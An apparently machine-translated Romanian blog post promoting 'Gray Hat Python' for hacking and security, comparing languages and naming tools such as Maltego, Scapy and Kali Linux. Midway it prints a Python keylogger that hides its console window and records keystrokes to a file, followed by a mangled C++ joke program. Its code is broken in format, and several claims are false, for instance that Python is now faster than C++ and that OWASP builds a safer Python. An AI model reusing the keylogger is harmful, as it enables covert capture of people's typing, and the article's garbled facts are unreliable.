Gray Hat Python - Așa că, doi ani în urmă, îmi făceam cercetări în limbajele de programare, am început să citesc despre C, C ++, Montaj, Python și Ruby. Am vrut să devin expert în securitate cibernetică. Așa că, am început să învăț cât pot. Am început cu C, C ++ și C # fiind elementele de bază, iar după ce am învățat și compilat o mulțime de programe și viruși, am început în sfârșit să învăț Kali Linux. Pentru aceia care nu știu ce este Kali Linux, este un sistem de operare pentru testarea penetrării. Deci, am continuat studiile mele și ceea ce am văzut a fost că, majoritatea programelor, virușilor și troienilor au fost compilate în Python, iar baza lor fiind Ruby.
Așadar, mi-am oprit studiile deocamdată și am început să învăț Python sau să fiu precis Python Grey Hat și tadaa … A fost extrem de ușor în comparație cu C, C # sau orice altă limbă pe care am învățat-o. Am ajuns în sfârșit să știu de ce Python a fost cel mai folosit limbaj și cum a devenit celebru.
Așadar, astăzi aș discuta despre modul în care Python s-a transformat în Python Grey Hat și de ce este utilizat atât de pe larg, încât chiar și Google și YouTube îl folosesc în baza lor de date pentru a da rezultate de căutare cât mai exacte.
Începând, Python este un limbaj de programare la nivel înalt, ceea ce înseamnă că sintaxele sale sunt extrem de ușor de citit, chiar și pentru începători. Dacă sunteți nou în programare, acesta ar fi limbajul cu care v-aș sugera să începeți. Permiteți-mi să vă dau un exemplu:
Așa arată în C: -
#include
int main()
(
printf("Hello world\n");
return 0;
)
Așa arată în Java: -
class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)
Și, așa arată în Python (v2.7)
print "Hello World"
Simplu? Da, este. Deci, Python a fost nu numai ușor de scris și de înțeles, dar și foarte compact. Deci, s-ar putea să vă întrebați cum a dus acest lucru la Gray Hat Python?
Cursuri recomandate
- Instruire de rutare IP
- Curs de instruire în hacking
- Pregătire completă RMAN
- Antrenament de programare Python
Python vs Gray Hat Python
Deci, ce este exact Gray Hat Python? De ce este atât de diferit de Python-ul nostru normal? Chestia este Gray Hat Python nu este altceva decât programe scrise în Python de hackeri, testatori de rețea de stres și Ingineri Reverse pentru a crea sau crack un program. Dar termenul Gray Hat este folosit deoarece nu este tocmai un software benefic sau pentru utilizator. Este folosit pentru Securizare sau pentru a crea un software care să reducă securitatea.
Poate fi utilizat cu ușurință fie pentru testarea limitărilor unui mediu sigur, fie pentru a intra într-un mediu sigur. Asta înseamnă Grey Hat. Și este mult mai ușor să o faci în Python decât să o faci în C, C ++ sau java. Astfel numele Gray Hat Python. Puține exemple la care pot să mă gândesc sunt:
• Scrierea jurnalelor de cheie (pentru hackeri și penticeri)
• Scrierea scripturilor Shell de securitate (pentru administratorii rețelei)
• Scrierea unui IDS automat (Sistem de detectare a intruziunilor pentru inginerii de securitate)
Așadar, acum știți de ce și cum este utilă Hat Hat Python. Pentru a elabora acest lucru, permiteți-mi să vă ofer câteva exemple detaliate.
Este posibil să fi auzit de Google App Engine. Google App Engine a fost proiectat inițial în Python înainte de a fi conectat. Aplicația Google este un exemplu adecvat de program scris în Python, deoarece permite construirea de aplicații web folosind colecția sa bogată de biblioteci, instrumente și cadru.
Te-ai întrebat vreodată de ce este atât de ușor să cauți ceva în Google? De cele mai multe ori obțineți rezultate de căutare care sunt exact 80%. Acest lucru se datorează faptului că Python este extrem de flexibil, funcționează cu viteză mare, iar bazele de date sunt mult mai compacte, deși stochează numărul de informații. Python este atât de extensibil, încât chiar și YouTube îl folosește în scopuri precum vizualizarea videoclipurilor, controlul șabloanelor, administrarea videoclipurilor, accesul la date canonice și multe altele.
Google are crawler-urile și păianjenii care adună date de îndată ce sunt încărcate pe web, indiferent unde sau cât de sigure sunt acestea. Unul are nevoie doar de o inspirație, timp și cunoștințe adecvate pentru a aduna aceste informații.
Căutările Google s-au bazat anterior pe Python, care ulterior s-a schimbat în C ++ pentru optimizarea vitezei, deoarece crawler-urile Google parcurg multe pagini pe secundă și fiecare dintre ele durează câteva minute pentru a se târui cu succes. Python, în prezent, este mult mai rapid decât C ++, dar nu a fost același caz în urmă cu câteva decenii.
Există un citat faimos citat de Google: -
"Python unde putem, C ++ unde trebuie."
Așadar, s-ar putea să vă întrebați cum poate fi folosit acest lucru pentru Hacking, Pentesting și Security Network. Țin să te contrazic. Dacă ați putea crea un program cu 70% -80% exact pentru a da rezultate eficiente de căutare, atunci puteți construi o aplicație care poate conecta site-uri web, căuta în mod inteligent și poate construi un profil al unei persoane care poate fi folosit mai degrabă de Căciuli Negre în scopuri rău intenționate. Lăsați persoanele deoparte, una chiar suficient de inteligentă, pot construi cu ușurință o aplicație pentru construirea unui profil al unei companii, întregul său arbore de la rădăcină până la orice vă puteți gândi …
Adunarea informațiilor prin Maltego
Poate vă gândiți că exagerez puțin. Nu, NU sunt!
Gândiți-vă la exemple precum Maltego. Maltego este un software sau îl pot re-fraza mai bine ca fiind o aplicație criminalistică open source, construită în scopul culegerii de informații și crearea profilului persoanelor, companiei și altor agenții corporative.
Trebuie doar să introduceți date adecvate în aplicație, iar alte lucruri precum link-uri de e-mail, oameni, grup de oameni, chiar și să determine infrastructura de internet, cum ar fi Domenii, nume DNS, Netblocks și adrese IP, pot fi conectate și interconectate folosind această informație open source .
Pentru mai multe informații vizitați pentru a afla Ce este Maltego?
Așadar, dacă accesul la „informații secrete” determină succesul dvs., atunci Maltego vă poate ajuta să îl descoperiți. Maltego este scris parțial în Python și folosește și Java, care este din nou un limbaj minunat.
Atât de mult pentru a cita despre securitatea de la Google. Pentru a fi mai precis, Google este cel mai puțin mod de a vă păstra anonim pe web, indiferent dacă folosiți incognito sau www.duckduckgo.com de la chrome. Pentru că, în cele din urmă, totul este actualizat pe web. Ideea de a fi aici este că nu este vorba de invulnerabilitate, este de a fi absolut vulnerabil. Nu se poate șterge complet pe Internet. Dar cu siguranță se poate încerca să păstreze cât mai puține informații pe Web.
Python nu este doar un limbaj, ci un limbaj de script. Limbile de script vă permit să scrieți, să modificați propriile instrumente, atunci când aveți nevoie de ceva mai personalizat. Aceste instrumente de securitate în rețea depind foarte mult de un limbaj de script pentru extensibilitate. De exemplu, haideți să luăm Scapy.
Scapy este scris pur și simplu în Python. Este un instrument puternic de manipulare a pachetelor interactive. Poate genera singuri pachete false, scanează rețele și poate chiar să adulceze pachete în rețea.
Găsiți informații detaliate despre Ce este Scapy?
Acum sunt programe complexe scrise de programatori avansați. Să vedem cât de simplu este să scrii un program în Python care să poată fi înțeles cu ușurință de către persoanele care au unele elemente de bază bune în programare.
Acesta este un keylogger scris în Python: -
#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)
proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input
Deci, acest lucru este mult mai ușor decât ușor dacă mă întrebați. Am adăugat pur și simplu modulele pyhook, Pythoncom, win32gui și win32console pe care le puteți descărca cu ușurință de pe site-ul sourceforge și am menționat comentariile folosind hash-tag. Dar dacă trebuie să scriu același program în C ++, să vedem cât de greu poate fi acest lucru.
Acesta este un program scris în C ++: -
#include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )
Deci, acesta este destul de mare în comparație cu Python. Și dacă vorbim despre eficiență, atunci Python poate fi compilat cu ușurință într-un executabil fără niciun efort folosind software-ul py2exe. În timp ce, dacă vorbesc despre C ++, atunci sincer vorbind, acest cod este o glumă. Pentru a scrie un registru de chei adecvat, trebuie să scrieți un DLL care implementează cârlig WH_KEYBOARD. În plus, acest cod este departe de a fi ușor de înțeles pentru un începător.
Hacking Open Source
Acum aceasta are grijă de hackerii Black Hat, care, pentru a fi mai exacti, sunt persoanele care intenționează să distrugă, să manipuleze datele pentru propriile nevoi. Vorbind din punct de vedere al preocupărilor de securitate, Python este de asemenea util pentru hackerii White Hat care intenționează să salveze societatea de atacul hackerilor rău intenționat. Dacă doriți să dezvoltați o carieră sau cel puțin doriți să învățați Python pentru cercetarea în domeniul securității, atunci cu siguranță puteți intra în profunzime cu OWASP, BRO sau Quick NIX Secure Script.
OWASP este un proiect de securitate pentru aplicații web deschise. OWASP își propune să creeze o versiune mai sigură a Python, care facilitează profesioniștii și dezvoltatorii de securitate să scrie software-ul mai puțin predispus la atacul hackerilor. Este legată de analiza Black-Box, identificarea și abordarea problemelor legate de securitate care pot afecta interpretul interactiv al Python.
BRO este un program de monitorizare a securității rețelei și a traficului, în timp ce Quick NIX este utilizat pentru a întări și asigura securitatea proprietăților de fișiere.
Deoarece vorbim de securitate, să vorbim despre un sistem de operare care se bazează parțial pe Python. Python funcționează excelent cu UNIX, LINUX și Debian. Unul dintre cele mai cunoscute sistem de operare a fost Backtrack 5. Au fost lansate diferite versiuni. A fost conceput special pentru PenTesting. Mai târziu, cei de la Offensive Security au crezut că Backtrack avea nevoie de o repornire din cauză că majoritatea instrumentelor nu funcționau corect sau nu au fost acceptate.
Mai târziu, au lansat Kali Linux, bazat în totalitate pe Debian. Și cea mai mare parte a cadrului său este fie în Ruby, fie în Python. De asemenea, Ruby este un limbaj de script extraordinar. Dar aș prefera oricând Python decât asta, motivul fiind Python are o comunitate mai diversă cu Linux și mai direct și mai ușor de depanat. În timp ce Ruby are o mulțime de caracteristici și se adaptează rapid la mediul său înconjurător, poate fi greu de depanat, greu de citit și este mai sofisticat decât Python.
Cel mai bun exemplu ar fi ca compararea Apple cu Linux sau Compararea iphone-ului cu Android-ul. Apple este bogat în resurse și este extrem de neted și este mai părtinitor față de începători. Întrucât Linux / Android este mai ușor de utilizat, este un pic mai întârziat și poate fi uneori o durere de cap, dacă nu știi cum să o configurezi sau să o menții.
Există chiar și o carte bazată pe Python Gray Hat Hacking de Justin Seitz. Se ocupă în mod special de automatizarea sarcinilor de inginerie inversă și de securitate, proiectând propriul injecție de depanare, bibliotecă și DLL, adulmecând traficul securizat pe o sesiune criptată și folosind imunitatea de depanare, Sulley și multe altele. Este o carte minunată nu contează dacă ești începător sau ești un expert, vei învăța întotdeauna unele sau alte lucruri de fiecare dată când o citești.
Concluzie
Așadar, dacă ești începător, Python ar fi alegerea potrivită pentru tine pentru a începe ca primul limbaj de testare a securității programării.
Amintiți-vă doar un lucru în cele din urmă Gray Hat Python nu este doar un limbaj, ci un mod de a face lucrurile într-un mod corect și rapid.
Prima sursă de imagine: pixabay.com
Articole similare:-
Iată câteva articole care vă vor ajuta să obțineți mai multe detalii despre Python-ul Grey Hat, așa că treceți doar pe link.
- Avantajele instrumentelor de securitate cibernetică Trebuie să fiți conștienți de
- Cariere în Python
- Top 25 Amazing Python Interview Întrebări și răspunsuri
- Care sunt avantajele și limitările utilizării Python?
- Python vs Node.js
- Ghid pentru întrebări de interviu pentru securitate cibernetică
- Diferite tipuri de instrumente pentru testarea securității